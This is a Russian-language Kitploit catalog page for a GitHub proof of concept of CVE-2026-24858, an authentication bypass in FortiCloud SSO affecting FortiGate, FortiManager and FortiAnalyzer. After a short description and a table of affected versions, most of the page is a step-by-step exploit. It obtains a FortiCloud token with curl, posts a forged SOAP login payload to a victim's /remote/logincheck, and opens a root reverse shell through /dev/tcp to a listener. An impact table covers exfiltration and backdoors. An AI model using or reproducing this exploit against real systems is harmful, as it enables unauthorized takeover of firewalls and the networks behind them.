Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud Single Sign On (SSO) — функция, включённая по умолчанию после регистрации любого FortiGate/FortiManager/FortiAnalyzer, содержит критическую уязвимость обхода аутентификации. | Kitploit
Инструменты/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud Single Sign On (SSO) — функция, включённая по умолчанию после регистрации любого FortiGate/FortiManager/FortiAnalyzer, содержит критическую уязвимость обхода аутентификации.

Репозиторий
9567 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24858 | Обход аутентификации FortiCloud SSO


Краткое описание

FortiCloud Single-Sign-On (SSO) — функция, включённая по умолчанию после регистрации любого FortiGate/FortiManager/FortiAnalyzer, содержит критическую уязвимость обхода аутентификации.

Злоумышленник, владеющий любой учётной записью FortiCloud (бесплатной или платной), может повторно использовать свой SSO-токен для входа в устройства других клиентов (версии ≤ указанных ниже) без знания их паролей.

После эксплуатации предоставляется полный доступ к административному GUI и root-оболочке, что позволяет перехватывать трафик, вмешиваться в работу VPN или перемещаться по внутренним сетям.

Немедленно обновите прошивку или отключите FortiCloud SSO до установки патча.


Затронутые версии

ПродуктУязвимая прошивкаИсправленная версия
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9та же major.minor+1
FortiAnalyzerте же диапазоныта же

PoC

  1. Машина атакующего
    Прослушивание для reverse shell:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Получение токена атакующего (TTL 15 минут)

    root@kitploit:~
    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    Ответ (фрагмент):

    root@kitploit:~
    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    Скопируйте значение access_token.

  3. Создание payload для обхода
    Сохраните как bypass.xml:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. Отправка жертве (любая прошивка ≤ указанной в таблице выше)

    root@kitploit:~
    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → успех.

  5. Доступ к административному GUI
    Откройте браузер или используйте curl с сохранённой cookie:

    root@kitploit:~
    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → Появляется Dashboard — пароль не запрашивается.

  6. Root-оболочка (виджет CLI)
    В GUI: Dashboard → CLI Console

    root@kitploit:~
    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    Прослушиватель получает:

    root@kitploit:~
    root@FGT80ETK21000000:/#
    

Влияние

СценарийРезультат
Администратор только для чтенияЭкспорт полной конфигурации (секреты VPN, локальные политики, хэши пользователей).
Администратор с правами записиИзменение правил межсетевого экрана, создание локальных пользователей, отключение журналирования, внедрение постоянных скриптов.
Root-оболочкаИзвлечение config.dat, получение ключей HA, переход во внутренние подсети, внедрение бэкдор-сервиса.
Горизонтальное перемещениеУстройство становится плацдармом; VLAN и SSL-VPN туннели считаются доверенными → более глубокое проникновение в сеть.
Экфильтрация данныхВесь трафик проходит через FortiGate → прозрачный прокси + внедрение сертификатов.
Скачать инструмент